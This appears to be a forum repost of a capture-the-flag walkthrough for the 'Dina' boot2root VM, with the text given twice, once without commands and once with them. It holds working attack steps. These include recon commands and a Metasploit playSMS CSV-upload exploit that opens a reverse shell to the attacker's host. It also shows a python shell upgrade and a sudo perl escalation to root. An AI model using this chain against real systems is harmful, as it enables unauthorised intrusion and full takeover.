ObbedCode
Token Liquidity Expert
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
200 XP
Today we are going to take another CTF challenge, Dina. The credit for making this VM machine goes to “Touhid Shaikh” and it is a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.
Security Level: Beginner
Penetrating Methodology:
Walkthrough:
Scanning:
Let’s start off by scanning the network and identifying the host IP address. We can identify our host IP as 192.168.43.219 by using Netdiscover.
Then, as usual, we used our favourite tool Nmap for port enumeration. We found that port 80 is open.
Enumeration:
As we can see port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage.
Also in the nmap scan, we found the robots.txt directory, so we tried to open it in the browser.
Inside the robots.txt directory, we found the names of multiple directories, so we tried to open each one of them one by one but found /nothing directory useful to us.
The source code of /nothing directory revealed some passwords which were useful later.
We have got the passwords so we used dirb to find out any further directories where we could use these passwords. We found a directory named /secure.
In the /secure directory there is a zip file named backup.zip. We download the file in our kali machine.
When we tried to extract the zip file it was password-protected, so we tried all the passwords found above and
Now after we extract the file we find an mp3 file. We checked the file type and found out it is actually an ASCII file. We opened it and got a username touhid and a name of directory /SecreTgatwayLogin.
We opened the directory in the browser and got a playSMS login page. We put in the username touhid and tried the password from the above-found list and
Exploitation:
In the exploitation phase, we looked for any exploit of playSMS web-application in the Metasploit and found two exploits.
We used the second exploit in which we are uploading our payload using a CSV file.
We put in the required fields and used touhid and diana as username and password.
After running the exploit, we successfully got a metrepreter session and the used python one-liner to get a proper shell.
On checking the sudo permissions for the www-data user, it had a sudo permission to run perl.
Privilege Escalation:
To elevate to root privileges we exploited the sudo permissions of perl and successfully got the root shell. And then traversed to the root directory and found the flag.txt file.
Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here
Security Level: Beginner
Penetrating Methodology:
- Scanning
- Netdiscover
- NMAP
- Enumeration
- NMAP
- Web Directory Search
- Exploitation
- Metasploit
- Privilege Escalation
- Exploiting Sudo rights
Walkthrough:
Scanning:
Let’s start off by scanning the network and identifying the host IP address. We can identify our host IP as 192.168.43.219 by using Netdiscover.
Code:
netdiscoverThen, as usual, we used our favourite tool Nmap for port enumeration. We found that port 80 is open.
Code:
nmap –A 192.168.43.219Enumeration:
As we can see port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage.
Also in the nmap scan, we found the robots.txt directory, so we tried to open it in the browser.
Inside the robots.txt directory, we found the names of multiple directories, so we tried to open each one of them one by one but found /nothing directory useful to us.
The source code of /nothing directory revealed some passwords which were useful later.
We have got the passwords so we used dirb to find out any further directories where we could use these passwords. We found a directory named /secure.
Code:
dirb http://192.168.43.219In the /secure directory there is a zip file named backup.zip. We download the file in our kali machine.
When we tried to extract the zip file it was password-protected, so we tried all the passwords found above and
was the correct one.
Now after we extract the file we find an mp3 file. We checked the file type and found out it is actually an ASCII file. We opened it and got a username touhid and a name of directory /SecreTgatwayLogin.
Code:
file backup-cred.mp3
cat backup-cred.mp3We opened the directory in the browser and got a playSMS login page. We put in the username touhid and tried the password from the above-found list and
worked for us.
Exploitation:
In the exploitation phase, we looked for any exploit of playSMS web-application in the Metasploit and found two exploits.
Code:
search playsmsWe used the second exploit in which we are uploading our payload using a CSV file.
We put in the required fields and used touhid and diana as username and password.
Code:
use exploit/multi/http/playsms_uploadcsv_exec
set rhost 192.168.43.219
set lhost 192.168.43.171
set lport 4444
set username touhid
set password Diana
set targeturi /SecreTgatwayLogin
exploitAfter running the exploit, we successfully got a metrepreter session and the used python one-liner to get a proper shell.
On checking the sudo permissions for the www-data user, it had a sudo permission to run perl.
Code:
getuid
shell
python -c 'import pty; pty.spawn("/bin/sh")'
sudo -lPrivilege Escalation:
To elevate to root privileges we exploited the sudo permissions of perl and successfully got the root shell. And then traversed to the root directory and found the flag.txt file.
Code:
sudo /usr/bin/perl –e "exec '/bin/sh'"
whoami
cd /root
ls
cat flag.txtAuthor: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here